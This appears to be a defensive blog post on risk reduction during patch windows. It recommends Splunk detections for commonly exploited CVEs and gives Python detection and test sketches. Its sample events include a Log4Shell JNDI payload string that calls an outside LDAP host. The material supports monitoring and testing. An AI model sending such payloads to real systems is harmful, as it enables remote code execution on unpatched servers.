Let’s take a few minutes today and talk about risk mitigation. Specifically, Reduction, one of the four risk mitigation techniques (avoidance, reduction, transference, and acceptance). We might as well get the other three out of the way first so we can focus on the one that matters here.
Avoidance. Operating an IT system is inherently risky. Avoiding risk means saying “No” to everything, which is seldom the right answer. Okay, saying “No” is the easy answer. My boss didn’t appoint me as a DAO for easy answers. He certainly didn’t appoint me as a DAO to turn off the world. An IT system that doesn’t work is secure, but how useful is it? We’re not here for easy, so let’s set aside avoidance as a strategy.
Transference. This is the most common way to deal with risk, and I will say that everyone reading this does it, whether you know it or not. The only function that can accept risk for an information system is the AO. Not the Program Manager. Not the ISSM. Not the SysAdmin. Only the AO is responsible for the risk of operating an information system. If there are unpatched vulnerabilities on a system, the AO is the one accepting the risk. Whether they know it or not. Whether they have been told about it or not. The AO is the one getting stuck with the short straw. When you think you are accepting risk, you are actually transferring it to your AO. You’re just not telling them about it.
Acceptance. Nothing like throwing your hands in the air and giving up. Again, not the most helpful strategy. The PM and the AO had better have a long and thoughtful conversation about this situation. Whatever is happening had better be so bleeding mission critical that doing nothing about it is the right answer. I’m not saying there are no cases where risk should be accepted. I’m saying that accepting risk should not be the default, go-to answer for everything. People need to understand that it is the AO accepting the risk. The AO is the one who will be testifying to Congress. If there is Risk to be accepted, the AO had better understand what they are accepting and why.
Reduction. While we’re not eliminating the risk, we’re trying to make things a little bit better. That’s where I want to lean in today. Looking back, I think this is the place where we can make a significant impact on our systems. While we could probably apply effort to reduce our risk across the board, or at least across multiple families of controls, the one we will use as a starting point is Flaw Remediation, SI-2.
Let me come clean with you right now. This isn’t in the JSIG. This isn’t in NIST 800-53, rev whatever. This is Cyber Security 350 stuff, maybe even Cyber Security 560 or 680. We’re talking about some advanced concepts. We’re thinking about things that are outside the box. The point is, this topic isn’t written down in the book someplace.
I’m starting with the assumption that you have a well-oiled, centrally managed flaw remediation plan that you’re collecting metrics on. You understand how long it takes you to deploy patches and updates. You’ve already taken some time, looked at your process for improvement, and made some of those improvements. You’re already deploying OS, application, and third-party patches and updates on the regular. I’m assuming that you’ve done all of this already and you are still looking for a way to make your system better. You’ve looked at your flaw remediation and configuration management processes and flogged them to within a hair of operating like a sewing machine. There’s nothing left to optimize. I’m also assuming that you are using SPLUNK as your audit reduction tool (ART). Yes, there are a ton of alternatives. A lot of you use SPLUNK, so it seems like a decent place to start.
If we follow the JSIG, flaw remediation on our systems occurs within 30 days of the security patch becoming available (SI-2.c for those of you playing the home game). I’ll be honest: if you are able to regularly identify, test, deploy, and confirm that a security patch has been correctly applied within 45 days of its release, you deserve a medal. That’s hard work, and a job well done.
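If you’re wondering what “collecting metrics” on that window looks like in practice, here’s a minimal sketch. It assumes you record the vendor release date and your deployment date for each patch somewhere you can query; the patch names and dates below are invented for illustration, not pulled from any real system.

```python
from datetime import date

# Hypothetical patch records: (patch, vendor release date, date we finished deploying).
# These entries are made up purely to show the arithmetic.
patches = [
    ("KB5012345",     date(2022, 4, 12),  date(2022, 5, 2)),
    ("openssl-3.0.3", date(2022, 5, 3),   date(2022, 6, 20)),
    ("log4j-2.17.1",  date(2021, 12, 28), date(2022, 1, 15)),
]

SI_2_WINDOW_DAYS = 30  # the JSIG SI-2.c window discussed above

for name, released, deployed in patches:
    age = (deployed - released).days
    status = "OK" if age <= SI_2_WINDOW_DAYS else "OVER WINDOW"
    print(f"{name}: {age} days from release to deployment [{status}]")

# The same numbers, averaged, give a rough mean-time-to-remediate figure
# you can trend month over month as part of ConMon.
mean_ttr = sum((deployed - released).days for _, released, deployed in patches) / len(patches)
print(f"Mean time to remediate: {mean_ttr:.1f} days")
```

The point isn’t the script; it’s that you know, with actual numbers, how long your window of exposure really is.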
If you think you’re in the 30-day club because you follow a Scan-Patch-Scan methodology, you don’t have a process. You’re just doing what an application tells you to do.
I said what I said.
Remember, this is a Cyber 350 class. We’re applying ConMon here and trying to make our process better; looking at ways of increasing the effectiveness of our processes. During that 30-day window, our system is Vulnerable to an identified flaw. Even if our system is not connected to the Internet, there is still a Threat of our system being exploited, whether through removable media or a malicious insider.
See what I did there? Vulnerability. Threat. Risk. Countermeasure.
So, what is the Countermeasure to the Risk? Apply the patch sooner, right? Drop everything and deploy security updates as soon as they are available from the vendor. There’s probably a place for that. What’s the cost associated with that methodology? I think we can agree you would all but need a dedicated staff just to handle security patches and updates. Pretty much a direct connection to the Internet and a total disregard for IT or business operations. All in the hopes of eliminating the risk. How feasible is that? How expensive is that Countermeasure? Dropping everything and surging may work for a one-off, but as a repeatable process?
Doing it more, or doing it “more gooder,” isn’t possible, at least not realistically or in a repeatable manner. The cost of the Countermeasure starts to get too great relative to the Threat and the Vulnerability. As a one-off? Sure. We’ve proven that we can do that, but it’s not sustainable. So how can we reduce the risk to our information systems during and after our flaw remediation process? That was the point of that first assumption, right? We’ve already executed ConMon on our Flaw Remediation process and gotten as good as we can get.
If we are worried about an adversary exploiting a vulnerability on our systems, we can always disconnect or turn off the affected systems. We can also look at stopping file transfers to and from the system in question. That’s AN approach. I would argue that these courses of action do not reduce our risk; they avoid it. Maybe there is a time and place for that, but for normal day-to-day operations, saying “No” isn’t the right answer.
What if we had a way to tell, or even be notified, that our system was being exploited through a given vulnerability? Would that have an impact on the risk of unresolved flaws or unpatched security vulnerabilities? I think that would be a more palatable Countermeasure than disconnecting our systems or stopping media transfers every time a Critical vulnerability is waiting to be patched.
Like any other Countermeasure, there is a cost associated with this, so we need to make sure we are applying it deliberately. With that in mind, I think a reasonable starting point would be the most commonly exploited CVEs in the wild right now. Fair?
CISA posted a list of the 15 most commonly exploited CVEs. Makes our life a little bit easier, huh? Hit the link for the details. Here’s the TL;DR: Log4Shell, ProxyLogon, ProxyShell, and CVE-2021-26084 for Atlassian Confluence. Those four attack families account for more than half of CISA’s top 15 CVEs.
If only there were some way to find out whether our system was being exploited through one of these vulnerabilities. Funny you should mention that. Remember our second assumption? We’re using SPLUNK as our ART. Let’s use some Google-Fu and search for Log4Shell site:splunk.com. If you didn’t know, the site: operator in Google limits the search to a specific website. Effectively, we’re searching splunk.com for every mention of Log4Shell.
There’s a reason we’re starting with SPLUNK. Remember our second lens of cybersecurity: “What’s in it for me?” Well, SPLUNK made this really easy to write. So.
Here’s some Inception-level Google-Fu. I googled the Google Command Cheat Sheet for you.
The second article is exactly what we are looking for. Splunk did the hard work for us. At the bottom is the search criteria that we need. That’s it. Add this to your dashboards and your alerts, and you have a fighting chance of identifying whether Log4Shell is being exploited. I’ll leave it to you to repeat the steps for the remaining three; you will find much the same. Yes, it’s not quite that easy, but it’s pretty close. It’s a lot easier than asking someone to research and test these exploits themselves and identify the indicators of compromise.
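To make the idea concrete without pasting Splunk’s search here, below is a minimal sketch in Python of what that kind of detection is doing under the hood. It is not the Splunk correlation search from the article, and the real detections are far more robust (they account for the obfuscated lookup strings attackers actually use); the sample events are fabricated.

```python
import re

# Oversimplified Log4Shell (CVE-2021-44228) indicator check, for illustration only.
# The Splunk detections linked above are the ones to actually deploy; this just
# shows the shape of the idea: watch incoming events for JNDI lookup strings
# and raise an alert when one shows up.
JNDI_PATTERN = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns|http)://", re.IGNORECASE)

def looks_like_log4shell(raw_event: str) -> bool:
    """Return True if the event contains an unobfuscated JNDI lookup string."""
    return bool(JNDI_PATTERN.search(raw_event))

# Fabricated sample events: one benign request, one carrying a JNDI payload.
sample_events = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 1024',
    '10.0.0.9 - - "GET /login HTTP/1.1" 200 512 "${jndi:ldap://203.0.113.7/a}"',
]

for event in sample_events:
    if looks_like_log4shell(event):
        print(f"ALERT - possible Log4Shell exploitation attempt: {event}")
```

In your ART, that print statement is a dashboard panel or an alert to whoever is on call.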
What about the rest? Well, here you go:
CVE-2021-44228 site:splunk.com – Second Article
ProxyLogon site:splunk.com – First Article
ProxyShell site:splunk.com – Second Article
https://research.splunk.com/endpoint/8c14eeee-2af1-4a4b-bda8-228da0f4862a/
CVE-2021-26084 site:splunk.com – First Article
https://www.splunk.com/en_us/blog/security/atlassian-confluence-vulnerability-cve-2022-26134.html
This is a great start, but we can do better. We can always do better. Our first lens of cybersecurity, after all, is “Why do we do what we do?” What do we do 30 days after CISA updates their list? What if I’m really worried about someone renaming PSEXEC? Come on. Did you honestly expect that I would leave it there? Splunk hooks us up with their Detection List. They have a metric crap ton of articles in their library. Something else I wanted to point out: there is also a data set that you can use to test your ART and verify it is configured correctly. We all know my thoughts on testing your ART. Filter and search the library to your heart’s content. Find what matters or is critical to your system.
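In that spirit, here is one way to think about testing: run known-bad and known-clean sample events through your detection logic and confirm the alerts fire exactly where you expect. This is a conceptual sketch, not Splunk’s attack data set; the indicator pattern and events are placeholders you would swap for your vendor’s vetted content.

```python
import re

# A tiny self-test harness in the spirit of "test your ART": every detection you
# rely on gets at least one event that SHOULD fire it and one that should not.
INDICATORS = {
    "Log4Shell (CVE-2021-44228)": re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns|http)://", re.IGNORECASE),
    # Add entries for the other CVEs using your ART vendor's published indicators.
}

TEST_CASES = [
    # (sample event, name of the indicator that should fire, or None for a clean event)
    ('"GET /login HTTP/1.1" 200 "${jndi:ldap://203.0.113.7/a}"', "Log4Shell (CVE-2021-44228)"),
    ('"GET /index.html HTTP/1.1" 200 1024', None),
]

for event, expected in TEST_CASES:
    fired = [name for name, pattern in INDICATORS.items() if pattern.search(event)]
    passed = (expected in fired) if expected else (not fired)
    print(f"{'PASS' if passed else 'FAIL'}: {event} -> {fired or 'no alert'}")
```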
For the record: a metric crap ton is different from an English crap ton. However, a butt load is a real unit of measurement. It’s 126 gallons of wine and has to do with how much wine would fit into a cart. There’s also an alternative measurement of – you know what… just look it up yourself.
The most risk-averse way to do this would be to add all of these to our SPLUNK dashboard and imagine all of the Risk that we’ve just Mitigated. I’m not sure it works that way. Every Countermeasure has a cost. I would apply this particular Countermeasure only to those places where it makes sense. I’m of the opinion that this is a case of “if everything is important, then nothing is important.” CISA’s top 15 list is a reasonable place to start. Based on your system, there may be another couple of entries on that list that make sense or that could help Reduce some Risk. Want to blow some people’s minds? Have this discussion with your SCA or AO.
What if you don’t use Atlassian on your network? Add it anyway. If it pops an alert, you know something is really wrong, like someone installed an app that you didn’t know about. Maybe you add it now, and at a later date you add Atlassian. What if you’ve already applied the patches for Log4Shell? Leave the alerts in place anyway. Even if you are completely, totally, stone-cold, lead-pipe-lock sure all your systems are patched, mistakes happen. It wouldn’t be the first time a system was missed. You still get a degree of risk reduction. What if you deployed a new system, your CM process wasn’t followed, and a vulnerable version of the application wasn’t actually removed like it was supposed to be? The point is that there are a lot of reasons and ways that this can make a nice safety net.
I know what some of you are thinking. I am not advocating that everyone drop an English crap ton of cash on SPLUNK. I’m just using it as an example. Like I said, I know a lot of sites use SPLUNK. You may even be saying, “But, Dave, I don’t use SPLUNK.” First off, don’t call me But Dave. Secondly: And? Use some Google-Fu and find out if your ART vendor has something similar. It took me about 10 minutes to find these examples using Google.
As we end our time together, let’s pull this discussion back up out of the weeds, because the weeds are not the point of this exercise. This was merely an example that is easy to see and digest; just one way, in one area, that we could try to mitigate risk. The real question is: what are the other areas of risk in your system? What methods have we looked at, and what questions have we asked, about trying to reduce that risk? How can you mitigate the risk of using open source or high-risk software? Folks are really excited about the STIGs. How can you mitigate the risk of not implementing a STIG-recommended setting? For something that matters, how can you reduce the risk of that open POA&M finding?